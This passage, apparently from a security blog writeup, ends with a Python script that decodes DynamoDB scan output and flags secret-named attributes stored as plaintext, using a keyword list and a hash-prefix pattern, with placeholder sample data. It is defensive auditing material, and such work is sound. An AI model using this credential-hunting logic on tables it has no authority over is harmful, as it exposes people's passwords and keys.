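SECRET_ATTRS = {"password", "passwd", "pass", "secret", "token", "api_key", "apikey"}

# A value that already looks like a crypt(3)-style "$id$..." or bcrypt "$2b$" hash
# is treated as hashed rather than plaintext (heuristic, not a strength check).
HASH_RE = re.compile(r"^\$(?:1|2[aby]?|5|6|7|y|argon2id?)\$")


def unmarshal(av: dict[str, Any]) -> Any:
    """Decode one AttributeValue such as {'S': 'x'} or {'M': {...}} into a Python value."""
    if len(av) != 1:
        raise ValueError(f"AttributeValue must have exactly one type key, got {av!r}")
    (kind, value), = av.items()
    if kind == "S":
        return value
    if kind == "N":                      # numbers travel as strings; keep exactness
        return Decimal(value)
    if kind == "BOOL":
        return bool(value)
    if kind == "NULL":
        return None
    if kind == "B":                      # binary is base64 in the JSON wire form
        return base64.b64decode(value)
    if kind == "SS":
        return set(value)
    if kind == "NS":
        return {Decimal(v) for v in value}
    if kind == "BS":
        return {base64.b64decode(v) for v in value}
    if kind == "L":
        return [unmarshal(v) for v in value]
    if kind == "M":
        return {k: unmarshal(v) for k, v in value.items()}
    raise ValueError(f"unsupported AttributeValue type {kind!r}")


def unmarshal_item(item: dict[str, dict[str, Any]]) -> dict[str, Any]:
    """Decode a whole item as returned by scan/getItem: {attribute: AttributeValue}."""
    return {k: unmarshal(v) for k, v in item.items()}


def find_plaintext_secrets(item: dict[str, Any], path: str = "") -> list[str]:
    """Return dotted paths of secret-named attributes whose value is a plaintext string."""
    findings: list[str] = []
    for key, value in item.items():
        here = f"{path}.{key}" if path else key
        if isinstance(value, dict):      # descend into map attributes
            findings.extend(find_plaintext_secrets(value, here))
        elif key.lower() in SECRET_ATTRS and isinstance(value, str) and not HASH_RE.match(value):
            findings.append(here)
    return findings


def audit_table(items: list[dict[str, dict[str, Any]]]) -> dict[str, list[str]]:
    """Map each item's 'username' to the plaintext-secret paths found in it (only items with findings)."""
    report: dict[str, list[str]] = {}
    for raw in items:
        decoded = unmarshal_item(raw)
        paths = find_plaintext_secrets(decoded)
        if paths:
            report[str(decoded.get("username", "?"))] = paths
    return report


# Constructed sample scan output in the same shape as the writeup's putItem payloads;
# every value here is a placeholder made up for the example.
SAMPLE_ITEMS = [
    {"username": {"S": "alice"}, "password": {"S": "Welcome123!"}},
    {"username": {"S": "bob"},
     "password": {"S": "$6$saltsalt$HASHHASHHASH"},           # already hashed, not flagged
     "profile": {"M": {"api_key": {"S": "example-api-key-placeholder"},
                       "logins": {"N": "3"}}}},
    {"username": {"S": "carol"}, "password": {"NULL": True}, "tags": {"SS": ["admin"]}},
]

if __name__ == "__main__":
    for user, paths in audit_table(SAMPLE_ITEMS).items():
        print(f"{user}: plaintext secret at {', '.join(paths)}")
```

<p>Run against a real <code>scan</code> result the same loop applies unchanged, since the JSON the CLI prints under <code>Items</code> is exactly this typed form; the point of the hash-prefix check is only to separate hashed from plaintext values, it says nothing about whether the hash itself is strong.</p>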
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>